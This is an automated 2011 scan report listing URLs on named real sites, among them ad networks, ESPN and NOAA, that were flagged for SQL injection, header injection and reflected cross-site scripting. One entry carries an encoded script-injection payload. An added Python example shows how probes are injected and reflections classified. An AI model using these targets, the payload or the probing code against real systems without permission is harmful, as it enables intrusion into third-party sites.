XSS, Reflected Cross Site Scripting, Javascript Injection, Example, Poc Report, 10222011-01

DORK, GHDB, BHDB, CWE-79, CAPEC-86, RXSS

Report generated by XSS.CX at Sun Oct 23 12:56:57 CDT 2011.

1. SQL injection

1.1. http://66.226.75.109/areaCodes/detail/240/x22 [REST URL parameter 3]

1.2. http://ad.doubleclick.net/adj/N5295.Internet.com/B5200652.4 [name of an arbitrarily supplied request parameter]

1.3. http://apps.facebook.com/espnucollegetown/ [Referer HTTP header]

1.4. http://beauty.glam.com/ [name of an arbitrarily supplied request parameter]

1.5. http://beauty.glam.com/wp-content/plugins/menus-plus/javascriptmenu.php [menu parameter]

1.6. http://blacklife.glam.com/wp-content/plugins/menus-plus/javascriptmenu.php [menu parameter]

1.7. http://brsseavideo-ak.espn.go.com/motion/ [userAB cookie]

1.8. http://celebrities.glam.com/ [name of an arbitrarily supplied request parameter]

1.9. http://celebrities.glam.com/wp-content/plugins/menus-plus/javascriptmenu.php [menu parameter]

1.10. http://core.insightexpressai.com/adServer/GetInvite2.aspx [adexpansion parameter]

1.11. http://core.insightexpressai.com/adServer/GetInvite2.aspx [click parameter]

1.12. http://core.insightexpressai.com/adServer/GetInvite2.aspx [creativeID parameter]

1.13. http://core.insightexpressai.com/adServer/GetInvite2.aspx [esi parameter]

1.14. http://core.insightexpressai.com/adServer/GetInvite2.aspx [name of an arbitrarily supplied request parameter]

1.15. http://core.insightexpressai.com/adServer/GetInvite2.aspx [placementID parameter]

1.16. http://core.insightexpressai.com/adServer/GetInvite2.aspx [referer parameter]

1.17. http://core.insightexpressai.com/adServer/GetInvite2.aspx [siteID parameter]

1.18. http://ds.addthis.com/red/psi/sites/www.manta.com/p.json [di cookie]

1.19. http://entertainment.glam.com/wp-content/plugins/menus-plus/javascriptmenu.php [menu parameter]

1.20. http://fashion.glam.com/2011/04/18/my-spring-shopping-decisions/ [REST URL parameter 1]

1.21. http://fashion.glam.com/2011/04/18/my-spring-shopping-decisions/ [name of an arbitrarily supplied request parameter]

1.22. http://fashion.glam.com/wp-content/plugins/menus-plus/javascriptmenu.php [menu parameter]

1.23. http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/ [name of an arbitrarily supplied request parameter]

1.24. http://forecast.weather.gov/product.php [name of an arbitrarily supplied request parameter]

1.25. http://forecast.weather.gov/wwamap/wwatxtget.php [REST URL parameter 1]

1.26. http://h.ackack.net/ [mystique parameter]

1.27. http://h.ackack.net/coldfusion-mysql-xsses.html/x22 [REST URL parameter 2]

1.28. http://h.ackack.net/protocols [mystique parameter]

1.29. http://h.ackack.net/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shBrushPhp.js [REST URL parameter 1]

1.30. http://h.ackack.net/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shBrushPhp.js [REST URL parameter 2]

1.31. http://h.ackack.net/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shBrushPhp.js [REST URL parameter 3]

1.32. http://h.ackack.net/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shBrushPhp.js [REST URL parameter 4]

1.33. http://h.ackack.net/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shBrushPhp.js [REST URL parameter 5]

1.34. http://h.ackack.net/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shBrushPhp.js [REST URL parameter 6]

1.35. http://h.ackack.net/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shCore.js [REST URL parameter 1]

1.36. http://h.ackack.net/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shCore.js [REST URL parameter 2]

1.37. http://h.ackack.net/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shCore.js [REST URL parameter 3]

1.38. http://h.ackack.net/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shCore.js [REST URL parameter 4]

1.39. http://h.ackack.net/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shCore.js [REST URL parameter 5]

1.40. http://h.ackack.net/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shCore.js [REST URL parameter 6]

1.41. http://h.ackack.net/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/styles/shCore.css [REST URL parameter 1]

1.42. http://h.ackack.net/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/styles/shCore.css [REST URL parameter 2]

1.43. http://h.ackack.net/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/styles/shCore.css [REST URL parameter 3]

1.44. http://h.ackack.net/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/styles/shCore.css [REST URL parameter 4]

1.45. http://h.ackack.net/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/styles/shCore.css [REST URL parameter 5]

1.46. http://h.ackack.net/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/styles/shCore.css [REST URL parameter 6]

1.47. http://h.ackack.net/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/styles/shThemeDefault.css [REST URL parameter 1]

1.48. http://h.ackack.net/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/styles/shThemeDefault.css [REST URL parameter 2]

1.49. http://h.ackack.net/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/styles/shThemeDefault.css [REST URL parameter 3]

1.50. http://h.ackack.net/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/styles/shThemeDefault.css [REST URL parameter 4]

1.51. http://h.ackack.net/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/styles/shThemeDefault.css [REST URL parameter 5]

1.52. http://h.ackack.net/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/styles/shThemeDefault.css [REST URL parameter 6]

1.53. http://h.ackack.net/wp-content/themes/mystique/favicon.ico [REST URL parameter 1]

1.54. http://h.ackack.net/wp-content/themes/mystique/favicon.ico [REST URL parameter 2]

1.55. http://h.ackack.net/wp-content/themes/mystique/favicon.ico [REST URL parameter 3]

1.56. http://h.ackack.net/wp-content/themes/mystique/favicon.ico [REST URL parameter 4]

1.57. http://h.ackack.net/wp-content/themes/mystique/js/jquery.mystique.js [REST URL parameter 1]

1.58. http://h.ackack.net/wp-content/themes/mystique/js/jquery.mystique.js [REST URL parameter 2]

1.59. http://h.ackack.net/wp-content/themes/mystique/js/jquery.mystique.js [REST URL parameter 3]

1.60. http://h.ackack.net/wp-content/themes/mystique/js/jquery.mystique.js [REST URL parameter 4]

1.61. http://h.ackack.net/wp-content/themes/mystique/js/jquery.mystique.js [REST URL parameter 5]

1.62. http://h.ackack.net/wp-includes/js/jquery/jquery.js [REST URL parameter 1]

1.63. http://h.ackack.net/wp-includes/js/jquery/jquery.js [REST URL parameter 2]

1.64. http://h.ackack.net/wp-includes/js/jquery/jquery.js [REST URL parameter 3]

1.65. http://h.ackack.net/wp-includes/js/jquery/jquery.js [REST URL parameter 4]

1.66. http://h.ackack.net/wp-includes/js/l10n.js [REST URL parameter 1]

1.67. http://h.ackack.net/wp-includes/js/l10n.js [REST URL parameter 2]

1.68. http://h.ackack.net/wp-includes/js/l10n.js [REST URL parameter 3]

1.69. http://health.glam.com/wp-content/plugins/menus-plus/javascriptmenu.php [menu parameter]

1.70. http://ib.adnxs.com/seg [t parameter]

1.71. http://insider.espn.go.com/mlb/blog [name parameter]

1.72. http://projects.webappsec.org/SQL-Injection [Referer HTTP header]

1.73. http://projects.webappsec.org/SQL-Injection [User-Agent HTTP header]

1.74. http://projects.webappsec.org/SQL-Injection [__qca cookie]

1.75. http://projects.webappsec.org/SQL-Injection [__utma cookie]

1.76. http://projects.webappsec.org/SQL-Injection [__utmb cookie]

1.77. http://projects.webappsec.org/SQL-Injection [__utmc cookie]

1.78. http://projects.webappsec.org/SQL-Injection [__utmz cookie]

1.79. http://projects.webappsec.org/SQL-Injection [name of an arbitrarily supplied request parameter]

1.80. http://projects.webappsec.org/SQL-Injection [pb_perfmon cookie]

1.81. http://projects.webappsec.org/SQL-Injection [pbj cookie]

1.82. http://projects.webappsec.org/w/session/login [Referer HTTP header]

1.83. http://recs.richrelevance.com/rrserver/p13n_generated.js [REST URL parameter 1]

1.84. http://response.restoration.noaa.gov/deepwaterhorizon/factsheets [%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000012)%3C/script%3E parameter]

1.85. http://response.restoration.noaa.gov/deepwaterhorizon/factsheets [REST URL parameter 1]

1.86. http://response.restoration.noaa.gov/deepwaterhorizon/factsheets [REST URL parameter 2]

1.87. http://response.restoration.noaa.gov/deepwaterhorizon/factsheets [name of an arbitrarily supplied request parameter]

1.88. http://response.restoration.noaa.gov/deepwaterhorizon/noaaroles [REST URL parameter 1]

1.89. http://response.restoration.noaa.gov/deepwaterhorizon/noaaroles [REST URL parameter 2]

1.90. http://response.restoration.noaa.gov/deepwaterhorizon/noaaroles [name of an arbitrarily supplied request parameter]

1.91. http://response.restoration.noaa.gov/dwh.php [REST URL parameter 1]

1.92. http://response.restoration.noaa.gov/favicon.ico [REST URL parameter 1]

1.93. http://response.restoration.noaa.gov/index.php [REST URL parameter 1]

1.94. http://response.restoration.noaa.gov/index.php [name of an arbitrarily supplied request parameter]

1.95. http://response.restoration.noaa.gov/orr_search.php [REST URL parameter 1]

1.96. http://soccernet.espn.go.com/fixtures [Referer HTTP header]

1.97. http://w88.go.com/b/ss/wdgespchicago,wdgespge/1/H.21/s8627410965971 [REST URL parameter 4]

1.98. http://w88.go.com/b/ss/wdgespnewyork,wdgespge/1/H.21/s14645075346343 [REST URL parameter 5]

1.99. http://w88.go.com/b/ss/wdgespvideo,wdgespge/0/FAS-2.8-AS3/s19650499410927 [REST URL parameter 1]

1.100. http://w88.go.com/b/ss/wdgespvideo,wdgespge/0/FAS-2.8-AS3/s19650499410927 [REST URL parameter 5]

1.101. http://wellness.glam.com/wp-content/plugins/menus-plus/javascriptmenu.php [menu parameter]

2. HTTP header injection

2.1. http://ad.doubleclick.net/ad/N3186.Glam/B5123462.24 [REST URL parameter 1]

2.2. http://ad.doubleclick.net/ad/N5295.Internet.com/B5200652.6 [REST URL parameter 1]

2.3. http://ad.doubleclick.net/ad/N6296.128238.MANTA.COM/B5149855.61 [REST URL parameter 1]

2.4. http://ad.doubleclick.net/adi/N3175.134426.GOOGLECONTENTNETWO1/B4640114.10 [REST URL parameter 1]

2.5. http://ad.doubleclick.net/adi/N3175.150800.VALUECLICK/B4640114.8 [REST URL parameter 1]

2.6. http://ad.doubleclick.net/adi/N6296.8585.TRAFFICMARKETPLACE/B5027088.348 [REST URL parameter 1]

2.7. http://ad.doubleclick.net/adj/KOMO/HOME [REST URL parameter 1]

2.8. http://ad.doubleclick.net/adj/N3175.134426.GOOGLECONTENTNETWO1/B4640114.10 [REST URL parameter 1]

2.9. http://ad.doubleclick.net/adj/N3175.150800.VALUECLICK/B4640114.8 [REST URL parameter 1]

2.10. http://ad.doubleclick.net/adj/N5271.glammedia.com/B5431193.4 [REST URL parameter 1]

2.11. http://ad.doubleclick.net/adj/N5295.Internet.com/B5200652.4 [REST URL parameter 1]

2.12. http://ad.doubleclick.net/adj/cm.glam_lifestyle/ [REST URL parameter 1]

2.13. http://ad.doubleclick.net/adj/manta.comp/energy_resources [REST URL parameter 1]

2.14. http://ad.doubleclick.net/dot.gif [REST URL parameter 1]

2.15. http://ad.doubleclick.net/jump/N3175.150800.VALUECLICK/B4640114.8 [REST URL parameter 1]

2.16. http://ad.doubleclick.net/jump/N5295.Internet.com/B5200652.6 [REST URL parameter 1]

2.17. http://cas.clickability.com/t [u parameter]

2.18. http://d.adroll.com/pixel/FWN5JUPQAJE4XJIM4JEU2F/7QKKZNUYGZBKBKY3PBNPYI [REST URL parameter 2]

2.19. http://d.adroll.com/pixel/FWN5JUPQAJE4XJIM4JEU2F/7QKKZNUYGZBKBKY3PBNPYI [REST URL parameter 3]

2.20. http://int.sitestat.com/comscore/comscore/s [REST URL parameter 3]

2.21. http://log.go.com/log [cp parameter]

2.22. http://log.go.com/log [source parameter]

2.23. http://o1.qnsr.com/cgi/c [a parameter]

2.24. http://o1.qnsr.com/cgi/c [name of an arbitrarily supplied request parameter]

2.25. http://search.espn.go.com/results [searchString parameter]

2.26. http://tacoda.at.atwola.com/rtx/r.js [N cookie]

2.27. http://tacoda.at.atwola.com/rtx/r.js [si parameter]

2.28. http://topics.nytimes.com/top/news/business/ [REST URL parameter 2]

2.29. http://topics.nytimes.com/top/news/business/ [REST URL parameter 3]

2.30. http://tracker-clk.bidder7.mookie1.com/tr-clk [url parameter]

2.31. http://tracker.bidder7.mookie1.com/tr-goog [u parameter]
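The bracketed labels used throughout this report ("REST URL parameter N", "name of an arbitrarily supplied request parameter", "Referer HTTP header", "<name> cookie") are the scanner's insertion points: the places in a single request where it dropped a probe and then looked for it in the response. The Python below is an added example, not XSS.CX's crawler code, showing how one URL expands into exactly those insertion points, how a probe is placed at each one, and the minimal check that separates an unencoded reflection from an escaped one. The host scanner.example, the fake_fetch server behaviour and the zx9qk marker are constructed for this example; the shCore.js path used in the check is only a URL shape from the list above, used to count path segments. How a real scanner numbers empty segments produced by a double slash is an assumption here (they are skipped).

```python
# Added example (not from the XSS.CX report): expand one URL into scanner-style
# insertion points, place a probe at each, and classify how it is reflected.
# scanner.example, fake_fetch and the zx9qk marker are constructed for this demo.
from urllib.parse import urlsplit, urlunsplit, parse_qsl, urlencode, quote
import html

CANARY = "zx9qk"                 # arbitrary marker, assumed absent from any real page
PROBE = f'"><{CANARY}>'          # closes an attribute/quoted string and opens a fake tag
ARBITRARY = "name of an arbitrarily supplied request parameter"


def insertion_points(url, header_names=("Referer", "User-Agent"), cookie_names=()):
    """List the insertion points a report like this one labels for one URL.
    REST URL parameter N is the N-th non-empty path segment, 1-based (assumption:
    empty segments from '//' are not counted)."""
    parts = urlsplit(url)
    segments = [s for s in parts.path.split("/") if s]
    points = [f"REST URL parameter {i}" for i in range(1, len(segments) + 1)]
    points += [f"{n} parameter" for n, _ in parse_qsl(parts.query, keep_blank_values=True)]
    points.append(ARBITRARY)
    points += [f"{h} HTTP header" for h in header_names]
    points += [f"{c} cookie" for c in cookie_names]
    return points


def inject(url, point, payload):
    """Return (url, headers, cookies) with `payload` placed at the named point."""
    parts = urlsplit(url)
    segments = [s for s in parts.path.split("/") if s]
    query = parse_qsl(parts.query, keep_blank_values=True)
    headers, cookies = {}, {}
    if point.startswith("REST URL parameter "):
        idx = int(point.rsplit(" ", 1)[1]) - 1
        segments[idx] = quote(payload, safe="")          # percent-encode the segment
        path = "/" + "/".join(segments)
        return urlunsplit((parts.scheme, parts.netloc, path, parts.query, "")), headers, cookies
    if point == ARBITRARY:
        query.append((payload, "1"))                     # payload is the *name* of a new parameter
    elif point.endswith(" parameter"):
        name = point[: -len(" parameter")]
        query = [(n, payload if n == name else v) for n, v in query]
    elif point.endswith(" HTTP header"):
        headers[point[: -len(" HTTP header")]] = payload
    elif point.endswith(" cookie"):
        cookies[point[: -len(" cookie")]] = payload
    new_url = urlunsplit((parts.scheme, parts.netloc, parts.path, urlencode(query), ""))
    return new_url, headers, cookies


def classify_reflection(body, canary=CANARY):
    """'unencoded' if the fake tag survives intact (HTML-context XSS candidate),
    'encoded' if the marker is present but its angle brackets were escaped or
    stripped, 'none' if the marker never came back."""
    if f"<{canary}>" in body:
        return "unencoded"
    if canary in body:
        return "encoded"
    return "none"


def scan(url, fetch, **kw):
    """Probe every insertion point of `url`; `fetch(url, headers, cookies)` must
    return a response body. Returns {insertion point: classification}."""
    results = {}
    for point in insertion_points(url, **kw):
        u, h, c = inject(url, point, PROBE)
        results[point] = classify_reflection(fetch(u, h, c))
    return results


def fake_fetch(url, headers, cookies):
    """Constructed stand-in for a server so the example runs offline: echoes the
    `sz` query parameter raw into a script block (vulnerable) and HTML-escapes
    the Referer header (safe); everything else is ignored."""
    q = dict(parse_qsl(urlsplit(url).query, keep_blank_values=True))
    sz = q.get("sz", "")
    ref = html.escape(headers.get("Referer", ""))
    return f'<script>var sz="{sz}";</script><p>from {ref}</p>'


if __name__ == "__main__":
    target = "http://scanner.example/adj/page/?sz=728x90"   # constructed target
    for point, verdict in scan(target, fake_fetch).items():
        print(f"{verdict:9s} {point}")
```

A reflected marker is only a candidate, not a confirmed issue: whether it is exploitable depends on the context it lands in (an HTML body, a quoted attribute, a JavaScript string inside a script block) and on any filtering the scanner's probe happened to survive. The many "[callback parameter]" entries in section 3 are the usual JSONP shape, where the response is JavaScript rather than HTML and the relevant test is whether the parameter is emitted as a bare identifier without being restricted to identifier characters, not whether a `<tag>` survives.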

3. Cross-site scripting (reflected)

3.1. http://1buy.blog.fc2.com/blog-entry-14.html [name of an arbitrarily supplied request parameter]

3.2. http://66.226.75.109/areaCodes/detail/240/x22 [REST URL parameter 3]

3.3. http://a.collective-media.net/adj/cm.glam_lifestyle/ [REST URL parameter 2]

3.4. http://a.collective-media.net/adj/cm.glam_lifestyle/ [name of an arbitrarily supplied request parameter]

3.5. http://a.collective-media.net/adj/cm.glam_lifestyle/ [sz parameter]

3.6. http://a.collective-media.net/adj/cm.glam_style/ [REST URL parameter 2]

3.7. http://a.collective-media.net/adj/cm.glam_style/ [name of an arbitrarily supplied request parameter]

3.8. http://a.collective-media.net/adj/cm.glam_style/ [sz parameter]

3.9. http://a.collective-media.net/adj/manta.comp/energy_resources [REST URL parameter 2]

3.10. http://a.collective-media.net/adj/manta.comp/energy_resources [REST URL parameter 3]

3.11. http://a.collective-media.net/adj/manta.comp/energy_resources [k parameter]

3.12. http://a.collective-media.net/adj/manta.comp/energy_resources [name of an arbitrarily supplied request parameter]

3.13. http://a.collective-media.net/adj/manta.comp/energy_resources [pos parameter]

3.14. http://a.collective-media.net/cmadj/manta.comp/energy_resources [REST URL parameter 1]

3.15. http://a.collective-media.net/cmadj/manta.comp/energy_resources [REST URL parameter 2]

3.16. http://a.collective-media.net/cmadj/manta.comp/energy_resources [REST URL parameter 3]

3.17. http://a.collective-media.net/cmadj/manta.comp/energy_resources [k parameter]

3.18. http://a.collective-media.net/cmadj/manta.comp/energy_resources [name of an arbitrarily supplied request parameter]

3.19. http://a.collective-media.net/cmadj/manta.comp/energy_resources [pos parameter]

3.20. http://a.espncdn.com/combiner/c [css parameter]

3.21. http://a.espncdn.com/combiner/c [js parameter]

3.22. http://a.espncdn.com/combiner/c/201012011221 [js parameter]

3.23. http://a.espncdn.com/combiner/c/201012011221 [js parameter]

3.24. http://abc.go.com/watch [aa parameter]

3.25. http://abc.go.com/watch [aa parameter]

3.26. http://abc.go.com/watch [aff parameter]

3.27. http://abc.go.com/watch [aff parameter]

3.28. http://abc.go.com/watch [al parameter]

3.29. http://abc.go.com/watch [al parameter]

3.30. http://abc.go.com/watch [i parameter]

3.31. http://abc.go.com/watch [i parameter]

3.32. http://abc.go.com/watch [name of an arbitrarily supplied request parameter]

3.33. http://abc.go.com/watch [name of an arbitrarily supplied request parameter]

3.34. http://abc.go.com/watch [partner parameter]

3.35. http://abc.go.com/watch [partner parameter]

3.36. http://abc.go.com/watch [pc parameter]

3.37. http://abc.go.com/watch [pc parameter]

3.38. http://abc.go.com/watch [pl parameter]

3.39. http://abc.go.com/watch [pl parameter]

3.40. http://abclocal.go.com/wls/story [section parameter]

3.41. http://ad.doubleclick.net/adi/N6296.8585.TRAFFICMARKETPLACE/B5027088.348 [adurl parameter]

3.42. http://ad.doubleclick.net/adi/N6296.8585.TRAFFICMARKETPLACE/B5027088.348 [ai parameter]

3.43. http://ad.doubleclick.net/adi/N6296.8585.TRAFFICMARKETPLACE/B5027088.348 [client parameter]

3.44. http://ad.doubleclick.net/adi/N6296.8585.TRAFFICMARKETPLACE/B5027088.348 [num parameter]

3.45. http://ad.doubleclick.net/adi/N6296.8585.TRAFFICMARKETPLACE/B5027088.348 [sig parameter]

3.46. http://ad.doubleclick.net/adi/N6296.8585.TRAFFICMARKETPLACE/B5027088.348 [sz parameter]

3.47. http://ad.doubleclick.net/adi/interactive.wsj.com/front_nonsub [!category parameter]

3.48. http://ad.doubleclick.net/adi/interactive.wsj.com/front_nonsub [name of an arbitrarily supplied request parameter]

3.49. http://ad.doubleclick.net/adi/interactive.wsj.com/front_nonsub [u parameter]

3.50. http://ad.doubleclick.net/adi/interactive.wsj.com/front_sub [!category parameter]

3.51. http://ad.doubleclick.net/adj/KOMO/HOME [sz parameter]

3.52. http://ad.doubleclick.net/adj/KOMO/HOME [sz parameter]

3.53. http://ad.turn.com/server/pixel.htm [fpid parameter]

3.54. http://ad.yieldmanager.com/v0/admeld-match [admeld_callback parameter]

3.55. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]

3.56. http://admeld.adnxs.com/usersync [admeld_callback parameter]

3.57. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_adprovider_id parameter]

3.58. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_callback parameter]

3.59. http://ads.pointroll.com/PortalServe/ [dom parameter]

3.60. http://ads.pointroll.com/PortalServe/ [flash parameter]

3.61. http://ads.pointroll.com/PortalServe/ [r parameter]

3.62. http://ads.pointroll.com/PortalServe/ [redir parameter]

3.63. http://ads.pointroll.com/PortalServe/ [time parameter]

3.64. http://adserver.veruta.com/cookiematch.fcgi [admeld_adprovider_id parameter]

3.65. http://adserver.veruta.com/cookiematch.fcgi [admeld_callback parameter]

3.66. http://ak.quantcast.com/css/ie6.css [REST URL parameter 1]

3.67. http://ak.quantcast.com/css/ie6.css [REST URL parameter 2]

3.68. http://ak.quantcast.com/css/ie7.css [REST URL parameter 1]

3.69. http://ak.quantcast.com/css/ie7.css [REST URL parameter 2]

3.70. http://ak.quantcast.com/dynamic-css/screen-optimized.css [REST URL parameter 1]

3.71. http://ak.quantcast.com/dynamic-css/screen-optimized.css [REST URL parameter 2]

3.72. http://ak.quantcast.com/images/sprite.png [REST URL parameter 1]

3.73. http://ak.quantcast.com/images/sprite.png [REST URL parameter 2]

3.74. http://ak.quantcast.com/js/concat.js [REST URL parameter 1]

3.75. http://ak.quantcast.com/js/concat.js [REST URL parameter 2]

3.76. http://altfarm.mediaplex.com/ad/js/1551-48114-17349-5 [mpt parameter]

3.77. http://altfarm.mediaplex.com/ad/js/1551-48114-17349-5 [mpvc parameter]

3.78. http://altfarm.mediaplex.com/ad/js/1551-48114-17349-5 [name of an arbitrarily supplied request parameter]

3.79. http://api-public.addthis.com/url/shares.json [callback parameter]

3.80. http://api.bing.com/qsonhs.aspx [q parameter]

3.81. http://api.bizographics.com/v1/profile.json [&callback parameter]

3.82. http://api.bizographics.com/v1/profile.json [api_key parameter]

3.83. http://api.tinker.com/event_timeline/213260.json [callback parameter]

3.84. http://api.viglink.com/api/install.js [key parameter]

3.85. http://api.viglink.com/api/ping [key parameter]

3.86. http://areacode.org/803 [name of an arbitrarily supplied request parameter]

3.87. http://b.scorecardresearch.com/beacon.js [c1 parameter]

3.88. http://b.scorecardresearch.com/beacon.js [c10 parameter]

3.89. http://b.scorecardresearch.com/beacon.js [c15 parameter]

3.90. http://b.scorecardresearch.com/beacon.js [c2 parameter]

3.91. http://b.scorecardresearch.com/beacon.js [c3 parameter]

3.92. http://b.scorecardresearch.com/beacon.js [c4 parameter]

3.93. http://b.scorecardresearch.com/beacon.js [c5 parameter]

3.94. http://b.scorecardresearch.com/beacon.js [c6 parameter]

3.95. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11060627171@x90 [REST URL parameter 2]

3.96. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11060627171@x90 [REST URL parameter 3]

3.97. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11060627171@x90 [REST URL parameter 4]

3.98. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11060627171@x90 [REST URL parameter 5]

3.99. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11060627171@x90 [REST URL parameter 6]

3.100. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11060627171@x90 [REST URL parameter 7]

3.101. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11959749775@x90 [REST URL parameter 2]

3.102. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11959749775@x90 [REST URL parameter 3]

3.103. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11959749775@x90 [REST URL parameter 4]

3.104. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11959749775@x90 [REST URL parameter 5]

3.105. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11959749775@x90 [REST URL parameter 6]

3.106. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11959749775@x90 [REST URL parameter 7]

3.107. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/1849951236@x90 [REST URL parameter 2]

3.108. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/1849951236@x90 [REST URL parameter 3]

3.109. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/1849951236@x90 [REST URL parameter 4]

3.110. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/1849951236@x90 [REST URL parameter 5]

3.111. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/1849951236@x90 [REST URL parameter 6]

3.112. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/1849951236@x90 [REST URL parameter 7]

3.113. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1@x90 [REST URL parameter 2]

3.114. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1@x90 [REST URL parameter 3]

3.115. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1@x90 [REST URL parameter 4]

3.116. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1@x90 [REST URL parameter 5]

3.117. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1@x90 [REST URL parameter 6]

3.118. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1@x90 [REST URL parameter 7]

3.119. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/1b5458553-7549-414b-83d2-2100a7556d38@x90 [REST URL parameter 2]

3.120. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/1b5458553-7549-414b-83d2-2100a7556d38@x90 [REST URL parameter 3]

3.121. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/1b5458553-7549-414b-83d2-2100a7556d38@x90 [REST URL parameter 4]

3.122. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/1b5458553-7549-414b-83d2-2100a7556d38@x90 [REST URL parameter 5]

3.123. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/1b5458553-7549-414b-83d2-2100a7556d38@x90 [REST URL parameter 6]

3.124. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/1b5458553-7549-414b-83d2-2100a7556d38@x90 [REST URL parameter 7]

3.125. http://blekko.com/autocomplete [query parameter]

3.126. http://broadband.espn.go.com/espn3/auth/espnnetworks/user [callback parameter]

3.127. http://core.insightexpressai.com/adServer/GetInvite2.aspx [adexpansion parameter]

3.128. http://core.insightexpressai.com/adServer/GetInvite2.aspx [click parameter]

3.129. http://core.insightexpressai.com/adServer/GetInvite2.aspx [creativeID parameter]

3.130. http://core.insightexpressai.com/adServer/GetInvite2.aspx [esi parameter]

3.131. http://core.insightexpressai.com/adServer/GetInvite2.aspx [name of an arbitrarily supplied request parameter]

3.132. http://core.insightexpressai.com/adServer/GetInvite2.aspx [placementID parameter]

3.133. http://core.insightexpressai.com/adServer/GetInvite2.aspx [referer parameter]

3.134. http://core.insightexpressai.com/adServer/GetInvite2.aspx [siteID parameter]

3.135. http://core.insightexpressai.com/adServer/adServerESI.aspx [name of an arbitrarily supplied request parameter]

3.136. http://d.chango.com/collector/admeldpixel [admeld_adprovider_id parameter]

3.137. http://d.chango.com/collector/admeldpixel [admeld_callback parameter]

3.138. http://d.chango.com/collector/admeldpixel [admeld_callback parameter]

3.139. http://dc305.4shared.com/main/upload.jsp [REST URL parameter 1]

3.140. http://dc305.4shared.com/main/upload.jsp [REST URL parameter 2]

3.141. http://dc308.4shared.com/main/upload.jsp [REST URL parameter 1]

3.142. http://dc308.4shared.com/main/upload.jsp [REST URL parameter 2]

3.143. http://digg.com/submit [REST URL parameter 1]

3.144. http://digibond.wpengine.com/wp-content/plugins/amr-ical-events-list/css/icallist.css [REST URL parameter 1]

3.145. http://digibond.wpengine.com/wp-content/plugins/amr-ical-events-list/css/icallist.css [REST URL parameter 5]

3.146. http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/amr-ical-events-list/css/icallist.css [REST URL parameter 1]

3.147. http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/amr-ical-events-list/css/icallist.css [REST URL parameter 2]

3.148. http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/amr-ical-events-list/css/icallist.css [REST URL parameter 5]

3.149. http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/amr-ical-events-list/css/icalprint.css [REST URL parameter 1]

